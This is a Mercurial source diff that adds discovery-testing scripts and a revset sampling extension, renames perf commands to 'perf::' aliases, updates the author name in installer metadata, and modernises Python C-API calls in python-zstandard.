a/contrib/packaging/hgpackaging/util.py +++ b/contrib/packaging/hgpackaging/util.py @@ -161,10 +161,10 @@ >>> normalize_windows_version("5.3rc1") '5.3.0.1' - >>> normalize_windows_version("5.3rc1+2-abcdef") + >>> normalize_windows_version("5.3rc1+hg2.abcdef") '5.3.0.1' - >>> normalize_windows_version("5.3+2-abcdef") + >>> normalize_windows_version("5.3+hg2.abcdef") '5.3.0.2' """ if '+' in version: @@ -188,8 +188,8 @@ if rc is not None: versions.append(rc) elif extra: - # <commit count>-<hash>+<date> - versions.append(int(extra.split('-')[0])) + # hg<commit count>.<hash>+<date> + versions.append(int(extra.split('.')[0][2:])) return '.'.join('%d' % x for x in versions[0:4]) diff --git a/contrib/packaging/inno/mercurial.iss b/contrib/packaging/inno/mercurial.iss --- a/contrib/packaging/inno/mercurial.iss +++ b/contrib/packaging/inno/mercurial.iss @@ -6,7 +6,7 @@ #endif [Setup] -AppCopyright=Copyright 2005-2021 Matt Mackall and others +AppCopyright=Copyright 2005-2021 Olivia Mackall and others AppName=Mercurial AppVersion={#VERSION} OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX} @@ -20,7 +20,7 @@ InfoAfterFile=../postinstall.txt LicenseFile=Copying.txt ShowLanguageDialog=yes -AppPublisher=Matt Mackall and others +AppPublisher=Olivia Mackall and others AppPublisherURL=https://mercurial-scm.org/ AppSupportURL=https://mercurial-scm.org/ AppUpdatesURL=https://mercurial-scm.org/ @@ -29,8 +29,8 @@ DefaultDirName={pf}\Mercurial SourceDir=stage VersionInfoDescription=Mercurial distributed SCM (version {#VERSION}) -VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others -VersionInfoCompany=Matt Mackall and others +VersionInfoCopyright=Copyright 2005-2021 Olivia Mackall and others +VersionInfoCompany=Olivia Mackall and others VersionInfoVersion={#QUAD_VERSION} InternalCompressLevel=max SolidCompression=true diff --git a/contrib/packaging/wix/mercurial.wxs b/contrib/packaging/wix/mercurial.wxs --- a/contrib/packaging/wix/mercurial.wxs +++ b/contrib/packaging/wix/mercurial.wxs @@ -19,14 +19,14 @@ Name='Mercurial $(var.Version) ($(var.Platform))' UpgradeCode='$(var.ProductUpgradeCode)' Language='1033' Codepage='1252' Version='$(var.Version)' - Manufacturer='Matt Mackall and others'> + Manufacturer='Olivia Mackall and others'> <Package Id='*' Keywords='Installer' Description="Mercurial distributed SCM (version $(var.Version))" Comments='$(var.Comments)' Platform='$(var.Platform)' - Manufacturer='Matt Mackall and others' + Manufacturer='Olivia Mackall and others' InstallerVersion='300' Languages='1033' Compressed='yes' SummaryCodepage='1252' /> <Media Id='1' Cabinet='mercurial.cab' EmbedCab='yes' DiskPrompt='CD-ROM #1' diff --git a/contrib/perf-utils/search-discovery-case b/contrib/perf-utils/search-discovery-case new file mode 100755 --- /dev/null +++ b/contrib/perf-utils/search-discovery-case @@ -0,0 +1,198 @@ +#!/usr/bin/env python3 +# Search for interesting discovery instance +# +# search-discovery-case REPO [REPO]… +# +# This use a subsetmaker extension (next to this script) to generate a steam of +# random discovery instance. When interesting case are discovered, information +# about them are print on the stdout. +from __future__ import print_function + +import json +import os +import queue +import random +import signal +import subprocess +import sys +import threading + +this_script = os.path.abspath(sys.argv[0]) +this_dir = os.path.dirname(this_script) +hg_dir = os.path.join(this_dir, '..', '..') +HG_REPO = os.path.normpath(hg_dir) +HG_BIN = os.path.join(HG_REPO, 'hg') + +JOB = int(os.environ.get('NUMBER_OF_PROCESSORS', 8)) + + +SLICING = ('scratch', 'randomantichain', 'rev') + + +def nb_revs(repo_path): + cmd = [ + HG_BIN, + '--repository', + repo_path, + 'log', + '--template', + '{rev}', + '--rev', + 'tip', + ] + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return int(out) + + +repos = [] +for repo in sys.argv[1:]: + size = nb_revs(repo) + repos.append((repo, size)) + + +def pick_one(repo): + pick = random.choice(SLICING) + seed = random.randint(0, 100000) + if pick == 'scratch': + start = int(repo[1] * 0.3) + end = int(repo[1] * 0.7) + nb = random.randint(start, end) + return ('scratch', nb, seed) + elif pick == 'randomantichain': + return ('randomantichain', seed) + elif pick == 'rev': + start = int(repo[1] * 0.3) + end = int(repo[1]) + rev = random.randint(start, end) + return ('rev', rev) + else: + assert False + + +done = threading.Event() +cases = queue.Queue(maxsize=10 * JOB) +results = queue.Queue() + + +def worker(): + while not done.is_set(): + c = cases.get() + if c is None: + return + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + c = (c[0], c[2], c[1]) + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + + +SUBSET_PATH = os.path.join(HG_REPO, 'contrib', 'perf-utils', 'subsetmaker.py') + + +CMD_BASE = ( + HG_BIN, + 'debugdiscovery', + '--template', + 'json', + '--config', + 'extensions.subset=%s' % SUBSET_PATH, +) +# '--local-as-revs "$left" --local-as-revs "$right"' +# > /data/discovery-references/results/disco-mozilla-unified-$1-$2.txt +# ) + + +def to_revsets(case): + t = case[0] + if t == 'scratch': + return 'not scratch(all(), %d, "%d")' % (case[1], case[2]) + elif t == 'randomantichain': + return '::randomantichain(all(), "%d")' % case[1] + elif t == 'rev': + return '::%d' % case[1] + else: + assert False + + +def process(case): + (repo, left, right) = case + cmd = list(CMD_BASE) + cmd.append('-R') + cmd.append(repo[0]) + cmd.append('--local-as-revs') + cmd.append(to_revsets(left)) + cmd.append('--remote-as-revs') + cmd.append(to_revsets(right)) + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return json.loads(out)[0] + + +def interesting_boundary(res): + """check if a case is interesting or not + + For now we are mostly interrested in case were we do multiple roundstrip + and where the boundary is somewhere in the middle of the undecided set. + + Ideally, we would make this configurable, but this is not a focus for now + + return None or (round-trip, undecided-common, undecided-missing) + """ + roundtrips = res["total-roundtrips"] + if roundtrips <= 1: + return None + undecided_common = res["nb-ini_und-common"] + undecided_missing = res["nb-ini_und-missing"] + if undecided_common == 0: + return None + if undecided_missing == 0: + return None + return (roundtrips, undecided_common, undecided_missing) + + +def end(*args, **kwargs): + done.set() + + +def format_case(case): + return '-'.join(str(s) for s in case) + + +signal.signal(signal.SIGINT, end) + +for i in range(JOB): + threading.Thread(target=worker).start() + +nb_cases = 0 +while not done.is_set(): + repo = random.choice(repos) + left = pick_one(repo) + right = pick_one(repo) + cases.put((repo, left, right)) + while not results.empty(): + # results has a single reader so this is fine + c, res = results.get_nowait() + boundary = interesting_boundary(res) + if boundary is not None: + print(c[0][0], format_case(c[1]), format_case(c[2]), *boundary) + sys.stdout.flush() + + nb_cases += 1 + if not nb_cases % 100: + print('[%d cases generated]' % nb_cases, file=sys.stderr) + +for i in range(JOB): + try: + cases.put_nowait(None) + except queue.Full: + pass + +print('[%d cases generated]' % nb_cases, file=sys.stderr) +print('[ouput generation is over]' % nb_cases, file=sys.stderr) diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py new file mode 100644 --- /dev/null +++ b/contrib/perf-utils/subsetmaker.py @@ -0,0 +1,170 @@ +"""revset to select sample of repository + +Hopefully this is useful to create interesting discovery cases. +""" + +import collections +import random + +from mercurial.i18n import _ + +from mercurial import ( + registrar, + revset, + revsetlang, + smartset, +) + +revsetpredicate = registrar.revsetpredicate() + + +@revsetpredicate(b'subsetspec("<spec>")') +def subsetmarkerspec(repo, subset, x): + """use a shorthand spec as used by search-discovery-case + + Supported format are: + + - "scratch-count-seed": not scratch(all(), count, "seed") + - "randomantichain-seed": ::randomantichain(all(), "seed") + - "rev-REV": "::REV" + """ + args = revsetlang.getargs( + x, 0, 1, _(b'subsetspec("spec") required an argument') + ) + + spec = revsetlang.getstring(args[0], _(b"spec should be a string")) + case = spec.split(b'-') + t = case[0] + if t == b'scratch': + spec_revset = b'not scratch(all(), %s, "%s")' % (case[1], case[2]) + elif t == b'randomantichain': + spec_revset = b'::randomantichain(all(), "%s")' % case[1] + elif t == b'rev': + spec_revset = b'::%d' % case[1] + else: + assert False, spec + + selected = repo.revs(spec_revset) + + return selected & subset + + +@revsetpredicate(b'scratch(REVS, <count>, [seed])') +def scratch(repo, subset, x): + """randomly remove <count> revision from the repository top + + This subset is created by recursively picking changeset starting from the + heads. It can be summarized using the following algorithm:: + + selected = set() + for i in range(<count>): + unselected = repo.revs("not <selected>") + candidates = repo.revs("heads(<unselected>)") + pick = random.choice(candidates) + selected.add(pick) + """ + m = _(b"scratch expects revisions, count argument and an optional seed") + args = revsetlang.getargs(x, 2, 3, m) + if len(args) == 2: + x, n = args + rand = random + elif len(args) == 3: + x, n, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + n = revsetlang.getinteger(n, _(b"scratch expects a number")) + + selected = set() + heads = set() + children_count = collections.defaultdict(lambda: 0) + parents = repo.changelog._uncheckedparentrevs + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + baseset.sort() + for r in baseset: + heads.add(r) + + p1, p2 = parents(r) + if p1 >= 0: + heads.discard(p1) + children_count[p1] += 1 + if p2 >= 0: + heads.discard(p2) + children_count[p2] += 1 + + for h in heads: + assert children_count[h] == 0 + + selected = set() + for x in range(n): + if not heads: + break + pick = rand.choice(list(heads)) + heads.remove(pick) + assert pick not in selected + selected.add(pick) + p1, p2 = parents(pick) + if p1 in children_count: + assert p1 in children_count + children_count[p1] -= 1 + assert children_count[p1] >= 0 + if children_count[p1] == 0: + assert p1 not in selected, (r, p1) + heads.add(p1) + if p2 in children_count: + assert p2 in children_count + children_count[p2] -= 1 + assert children_count[p2] >= 0 + if children_count[p2] == 0: + assert p2 not in selected, (r, p2) + heads.add(p2) + + return smartset.baseset(selected) & subset + + +@revsetpredicate(b'randomantichain(REVS, [seed])') +def antichain(repo, subset, x): + """Pick a random anti-chain in the repository + + A antichain is a set of changeset where there isn't any element that is + either a descendant or ancestors of any other element in the set. In other + word, all the elements are independant. It can be summarized with the + following algorithm:: + + selected = set() + unselected = repo.revs('all()') + while unselected: + pick = random.choice(unselected) + selected.add(pick) + unselected -= repo.revs('::<pick> + <pick>::') + """ + + args = revsetlang.getargs( + x, 1, 2, _(b"randomantichain expects revisions and an optional seed") + ) + if len(args) == 1: + (x,) = args + rand = random + elif len(args) == 2: + x, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + selected = set() + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + undecided = baseset + + while undecided: + pick = rand.choice(list(undecided)) + selected.add(pick) + undecided = repo.revs( + '%ld and not (::%ld or %ld::head())', baseset, selected, selected + ) + + return smartset.baseset(selected) & subset diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -744,7 +744,7 @@ # perf commands -@command(b'perfwalk', formatteropts) +@command(b'perf::walk|perfwalk', formatteropts) def perfwalk(ui, repo, *pats, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -759,7 +759,7 @@ fm.end() -@command(b'perfannotate', formatteropts) +@command(b'perf::annotate|perfannotate', formatteropts) def perfannotate(ui, repo, f, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -769,7 +769,7 @@ @command( - b'perfstatus', + b'perf::status|perfstatus', [ (b'u', b'unknown', False, b'ask status to look for unknown files'), (b'', b'dirstate', False, b'benchmark the internal dirstate call'), @@ -806,7 +806,7 @@ fm.end() -@command(b'perfaddremove', formatteropts) +@command(b'perf::addremove|perfaddremove', formatteropts) def perfaddremove(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -837,7 +837,7 @@ cl._nodepos = None -@command(b'perfheads', formatteropts) +@command(b'perf::heads|perfheads', formatteropts) def perfheads(ui, repo, **opts): """benchmark the computation of a changelog heads""" opts = _byteskwargs(opts) @@ -855,7 +855,7 @@ @command( - b'perftags', + b'perf::tags|perftags', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -880,7 +880,7 @@ fm.end() -@command(b'perfancestors', formatteropts) +@command(b'perf::ancestors|perfancestors', formatteropts) def perfancestors(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -894,7 +894,7 @@ fm.end() -@command(b'perfancestorset', formatteropts) +@command(b'perf::ancestorset|perfancestorset', formatteropts) def perfancestorset(ui, repo, revset, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -910,12 +910,18 @@ fm.end() -@command(b'perfdiscovery', formatteropts, b'PATH') +@command(b'perf::discovery|perfdiscovery', formatteropts, b'PATH') def perfdiscovery(ui, repo, path, **opts): """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] timer, fm = gettimer(ui, opts) - path = ui.expandpath(path) + + try: + from mercurial.utils.urlutil import get_unique_pull_path + + path = get_unique_pull_path(b'perfdiscovery', repo, ui, path)[0] + except ImportError: + path = ui.expandpath(path) def s(): repos[1] = hg.peer(ui, opts, path) @@ -928,7 +934,7 @@ @command( - b'perfbookmarks', + b'perf::bookmarks|perfbookmarks', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -953,7 +959,7 @@ fm.end() -@command(b'perfbundleread', formatteropts, b'BUNDLE') +@command(b'perf::bundleread|perfbundleread', formatteropts, b'BUNDLE') def perfbundleread(ui, repo, bundlepath, **opts): """Benchmark reading of bundle files. @@ -1080,7 +1086,7 @@ @command( - b'perfchangegroupchangelog', + b'perf::changegroupchangelog|perfchangegroupchangelog', formatteropts + [ (b'', b'cgversion', b'02', b'changegroup version'), @@ -1116,7 +1122,7 @@ fm.end() -@command(b'perfdirs', formatteropts) +@command(b'perf::dirs|perfdirs', formatteropts) def perfdirs(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1132,7 +1138,7 @@ @command( - b'perfdirstate', + b'perf::dirstate|perfdirstate', [ ( b'', @@ -1195,7 +1201,7 @@ fm.end() -@command(b'perfdirstatedirs', formatteropts) +@command(b'perf::dirstatedirs|perfdirstatedirs', formatteropts) def perfdirstatedirs(ui, repo, **opts): """benchmap a 'dirstate.hasdir' call from an empty `dirs` cache""" opts = _byteskwargs(opts) @@ -1212,7 +1218,7 @@ fm.end() -@command(b'perfdirstatefoldmap', formatteropts) +@command(b'perf::dirstatefoldmap|perfdirstatefoldmap', formatteropts) def perfdirstatefoldmap(ui, repo, **opts): """benchmap a `dirstate._map.filefoldmap.get()` request @@ -1233,7 +1239,7 @@ fm.end() -@command(b'perfdirfoldmap', formatteropts) +@command(b'perf::dirfoldmap|perfdirfoldmap', formatteropts) def perfdirfoldmap(ui, repo, **opts): """benchmap a `dirstate._map.dirfoldmap.get()` request @@ -1255,7 +1261,7 @@ fm.end() -@command(b'perfdirstatewrite', formatteropts) +@command(b'perf::dirstatewrite|perfdirstatewrite', formatteropts) def perfdirstatewrite(ui, repo, **opts): """benchmap the time it take to write a dirstate on disk""" opts = _byteskwargs(opts) @@ -1297,7 +1303,7 @@ @command( - b'perfmergecalculate', + b'perf::mergecalculate|perfmergecalculate', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1330,7 +1336,7 @@ @command( - b'perfmergecopies', + b'perf::mergecopies|perfmergecopies', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1353,7 +1359,7 @@ fm.end() -@command(b'perfpathcopies', [], b"REV REV") +@command(b'perf::pathcopies|perfpathcopies', [], b"REV REV") def perfpathcopies(ui, repo, rev1, rev2, **opts): """benchmark the copy tracing logic""" opts = _byteskwargs(opts) @@ -1369,7 +1375,7 @@ @command( - b'perfphases', + b'perf::phases|perfphases', [ (b'', b'full', False, b'include file reading time too'), ], @@ -1394,7 +1400,7 @@ fm.end() -@command(b'perfphasesremote', [], b"[DEST]") +@command(b'perf::phasesremote|perfphasesremote', [], b"[DEST]") def perfphasesremote(ui, repo, dest=None, **opts): """benchmark time needed to analyse phases of the remote server""" from mercurial.node import bin @@ -1407,7 +1413,7 @@ opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( b'default repository not configured!', @@ -1455,7 +1461,7 @@ @command( - b'perfmanifest', + b'perf::manifest|perfmanifest', [ (b'm', b'manifest-rev', False, b'Look up a manifest node revision'), (b'', b'clear-disk', False, b'clear on-disk caches too'), @@ -1499,7 +1505,7 @@ fm.end() -@command(b'perfchangeset', formatteropts) +@command(b'perf::changeset|perfchangeset', formatteropts) def perfchangeset(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1513,7 +1519,7 @@ fm.end() -@command(b'perfignore', formatteropts) +@command(b'perf::ignore|perfignore', formatteropts) def perfignore(ui, repo, **opts): """benchmark operation related to computing ignore""" opts = _byteskwargs(opts) @@ -1532,7 +1538,7 @@ @command( - b'perfindex', + b'perf::index|perfindex', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'no-lookup', None, b'do not revision lookup post creation'), @@ -1596,7 +1602,7 @@ @command( - b'perfnodemap', + b'perf::nodemap|perfnodemap', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'clear-caches', True, b'clear revlog cache between calls'), @@ -1667,7 +1673,7 @@ fm.end() -@command(b'perfstartup', formatteropts) +@command(b'perf::startup|perfstartup', formatteropts) def perfstartup(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1685,7 +1691,7 @@ fm.end() -@command(b'perfparents', formatteropts) +@command(b'perf::parents|perfparents', formatteropts) def perfparents(ui, repo, **opts): """benchmark the time necessary to fetch one changeset's parents. @@ -1712,7 +1718,7 @@ fm.end() -@command(b'perfctxfiles', formatteropts) +@command(b'perf::ctxfiles|perfctxfiles', formatteropts) def perfctxfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1725,7 +1731,7 @@ fm.end() -@command(b'perfrawfiles', formatteropts) +@command(b'perf::rawfiles|perfrawfiles', formatteropts) def perfrawfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1739,7 +1745,7 @@ fm.end() -@command(b'perflookup', formatteropts) +@command(b'perf::lookup|perflookup', formatteropts) def perflookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1748,7 +1754,7 @@ @command( - b'perflinelogedits', + b'perf::linelogedits|perflinelogedits', [ (b'n', b'edits', 10000, b'number of edits'), (b'', b'max-hunk-lines', 10, b'max lines in a hunk'), @@ -1786,7 +1792,7 @@ fm.end() -@command(b'perfrevrange', formatteropts) +@command(b'perf::revrange|perfrevrange', formatteropts) def perfrevrange(ui, repo, *specs, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1795,7 +1801,7 @@ fm.end() -@command(b'perfnodelookup', formatteropts) +@command(b'perf::nodelookup|perfnodelookup', formatteropts) def perfnodelookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1814,7 +1820,7 @@ @command( - b'perflog', + b'perf::log|perflog', [(b'', b'rename', False, b'ask log to follow renames')] + formatteropts, ) def perflog(ui, repo, rev=None, **opts): @@ -1832,7 +1838,7 @@ fm.end() -@command(b'perfmoonwalk', formatteropts) +@command(b'perf::moonwalk|perfmoonwalk', formatteropts) def perfmoonwalk(ui, repo, **opts): """benchmark walking the changelog backwards @@ -1851,7 +1857,7 @@ @command( - b'perftemplating', + b'perf::templating|perftemplating', [ (b'r', b'rev', [], b'revisions to run the template on'), ] @@ -1941,7 +1947,7 @@ @command( - b'perfhelper-mergecopies', + b'perf::helper-mergecopies|perfhelper-mergecopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2124,7 +2130,7 @@ @command( - b'perfhelper-pathcopies', + b'perf::helper-pathcopies|perfhelper-pathcopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2263,7 +2269,7 @@ _displaystats(ui, opts, entries, alldata) -@command(b'perfcca', formatteropts) +@command(b'perf::cca|perfcca', formatteropts) def perfcca(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2271,7 +2277,7 @@ fm.end() -@command(b'perffncacheload', formatteropts) +@command(b'perf::fncacheload|perffncacheload', formatteropts) def perffncacheload(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2284,7 +2290,7 @@ fm.end() -@command(b'perffncachewrite', formatteropts) +@command(b'perf::fncachewrite|perffncachewrite', formatteropts) def perffncachewrite(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2304,7 +2310,7 @@ fm.end() -@command(b'perffncacheencode', formatteropts) +@command(b'perf::fncacheencode|perffncacheencode', formatteropts) def perffncacheencode(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2348,7 +2354,7 @@ @command( - b'perfbdiff', + b'perf::bdiff|perfbdiff', revlogopts + formatteropts + [ @@ -2464,7 +2470,7 @@ @command( - b'perfunidiff', + b'perf::unidiff|perfunidiff', revlogopts + formatteropts + [ @@ -2543,7 +2549,7 @@ fm.end() -@command(b'perfdiffwd', formatteropts) +@command(b'perf::diffwd|perfdiffwd', formatteropts) def perfdiffwd(ui, repo, **opts): """Profile diff of working directory changes""" opts = _byteskwargs(opts) @@ -2568,7 +2574,11 @@ fm.end() -@command(b'perfrevlogindex', revlogopts + formatteropts, b'-c|-m|FILE') +@command( + b'perf::revlogindex|perfrevlogindex', + revlogopts + formatteropts, + b'-c|-m|FILE', +) def perfrevlogindex(ui, repo, file_=None, **opts): """Benchmark operations against a revlog index. @@ -2704,7 +2714,7 @@ @command( - b'perfrevlogrevisions', + b'perf::revlogrevisions|perfrevlogrevisions', revlogopts + formatteropts + [ @@ -2754,7 +2764,7 @@ @command( - b'perfrevlogwrite', + b'perf::revlogwrite|perfrevlogwrite', revlogopts + formatteropts + [ @@ -3047,7 +3057,7 @@ @command( - b'perfrevlogchunks', + b'perf::revlogchunks|perfrevlogchunks', revlogopts + formatteropts + [ @@ -3176,7 +3186,7 @@ @command( - b'perfrevlogrevision', + b'perf::revlogrevision|perfrevlogrevision', revlogopts + formatteropts + [(b'', b'cache', False, b'use caches instead of clearing')], @@ -3218,7 +3228,10 @@ start = r.start length = r.length inline = r._inline - iosize = r._io.size + try: + iosize = r.index.entry_size + except AttributeError: + iosize = r._io.size buffer = util.buffer chunks = [] @@ -3319,7 +3332,7 @@ @command( - b'perfrevset', + b'perf::revset|perfrevset', [ (b'C', b'clear', False, b'clear volatile cache between each call.'), (b'', b'contexts', False, b'obtain changectx for each revision'), @@ -3352,7 +3365,7 @@ @command( - b'perfvolatilesets', + b'perf::volatilesets|perfvolatilesets', [ (b'', b'clear-obsstore', False, b'drop obsstore between each call.'), ] @@ -3401,7 +3414,7 @@ @command( - b'perfbranchmap', + b'perf::branchmap|perfbranchmap', [ (b'f', b'full', False, b'Includes build time of subset'), ( @@ -3492,7 +3505,7 @@ @command( - b'perfbranchmapupdate', + b'perf::branchmapupdate|perfbranchmapupdate', [ (b'', b'base', [], b'subset of revision to start from'), (b'', b'target', [], b'subset of revision to end with'), @@ -3602,7 +3615,7 @@ @command( - b'perfbranchmapload', + b'perf::branchmapload|perfbranchmapload', [ (b'f', b'filter', b'', b'Specify repoview filter'), (b'', b'list', False, b'List brachmap filter caches'), @@ -3661,19 +3674,19 @@ fm.end() -@command(b'perfloadmarkers') +@command(b'perf::loadmarkers|perfloadmarkers') def perfloadmarkers(ui, repo): """benchmark the time to parse the on-disk markers for a repo Result is the number of markers in the repo.""" timer, fm = gettimer(ui) svfs = getsvfs(repo) - timer(lambda: len(obsolete.obsstore(svfs))) + timer(lambda: len(obsolete.obsstore(repo, svfs))) fm.end() @command( - b'perflrucachedict', + b'perf::lrucachedict|perflrucachedict', formatteropts + [ (b'', b'costlimit', 0, b'maximum total cost of items in cache'), @@ -3829,7 +3842,7 @@ @command( - b'perfwrite', + b'perf::write|perfwrite', formatteropts + [ (b'', b'write-method', b'write', b'ui write method'), @@ -3892,7 +3905,7 @@ @command( - b'perfprogress', + b'perf::progress|perfprogress', formatteropts + [ (b'', b'topic', b'topic', b'topic for progress messages'), diff --git a/contrib/python-zstandard/c-ext/bufferutil.c b/contrib/python-zstandard/c-ext/bufferutil.c --- a/contrib/python-zstandard/c-ext/bufferutil.c +++ b/contrib/python-zstandard/c-ext/bufferutil.c @@ -758,7 +758,7 @@ }; void bufferutil_module_init(PyObject* mod) { - Py_TYPE(&ZstdBufferWithSegmentsType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsType) < 0) { return; } @@ -766,7 +766,7 @@ Py_INCREF(&ZstdBufferWithSegmentsType); PyModule_AddObject(mod, "BufferWithSegments", (PyObject*)&ZstdBufferWithSegmentsType); - Py_TYPE(&ZstdBufferSegmentsType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentsType) < 0) { return; } @@ -774,7 +774,7 @@ Py_INCREF(&ZstdBufferSegmentsType); PyModule_AddObject(mod, "BufferSegments", (PyObject*)&ZstdBufferSegmentsType); - Py_TYPE(&ZstdBufferSegmentType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferSegmentType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentType) < 0) { return; } @@ -782,7 +782,7 @@ Py_INCREF(&ZstdBufferSegmentType); PyModule_AddObject(mod, "BufferSegment", (PyObject*)&ZstdBufferSegmentType); - Py_TYPE(&ZstdBufferWithSegmentsCollectionType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsCollectionType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsCollectionType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionchunker.c b/contrib/python-zstandard/c-ext/compressionchunker.c --- a/contrib/python-zstandard/c-ext/compressionchunker.c +++ b/contrib/python-zstandard/c-ext/compressionchunker.c @@ -348,12 +348,12 @@ }; void compressionchunker_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionChunkerIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerIteratorType) < 0) { return; } - Py_TYPE(&ZstdCompressionChunkerType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressiondict.c b/contrib/python-zstandard/c-ext/compressiondict.c --- a/contrib/python-zstandard/c-ext/compressiondict.c +++ b/contrib/python-zstandard/c-ext/compressiondict.c @@ -400,7 +400,7 @@ }; void compressiondict_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionDictType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionDictType, &PyType_Type); if (PyType_Ready(&ZstdCompressionDictType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionparams.c b/contrib/python-zstandard/c-ext/compressionparams.c --- a/contrib/python-zstandard/c-ext/compressionparams.c +++ b/contrib/python-zstandard/c-ext/compressionparams.c @@ -556,7 +556,7 @@ }; void compressionparams_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionParametersType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionParametersType, &PyType_Type); if (PyType_Ready(&ZstdCompressionParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionreader.c b/contrib/python-zstandard/c-ext/compressionreader.c --- a/contrib/python-zstandard/c-ext/compressionreader.c +++ b/contrib/python-zstandard/c-ext/compressionreader.c @@ -811,7 +811,7 @@ void compressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdCompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdCompressionReaderType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionwriter.c b/contrib/python-zstandard/c-ext/compressionwriter.c --- a/contrib/python-zstandard/c-ext/compressionwriter.c +++ b/contrib/python-zstandard/c-ext/compressionwriter.c @@ -365,7 +365,7 @@ }; void compressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdCompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressobj.c b/contrib/python-zstandard/c-ext/compressobj.c --- a/contrib/python-zstandard/c-ext/compressobj.c +++ b/contrib/python-zstandard/c-ext/compressobj.c @@ -249,7 +249,7 @@ }; void compressobj_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdCompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressor.c b/contrib/python-zstandard/c-ext/compressor.c --- a/contrib/python-zstandard/c-ext/compressor.c +++ b/contrib/python-zstandard/c-ext/compressor.c @@ -619,7 +619,7 @@ goto finally; } - Py_SIZE(output) = outBuffer.pos; + Py_SET_SIZE(output, outBuffer.pos); finally: 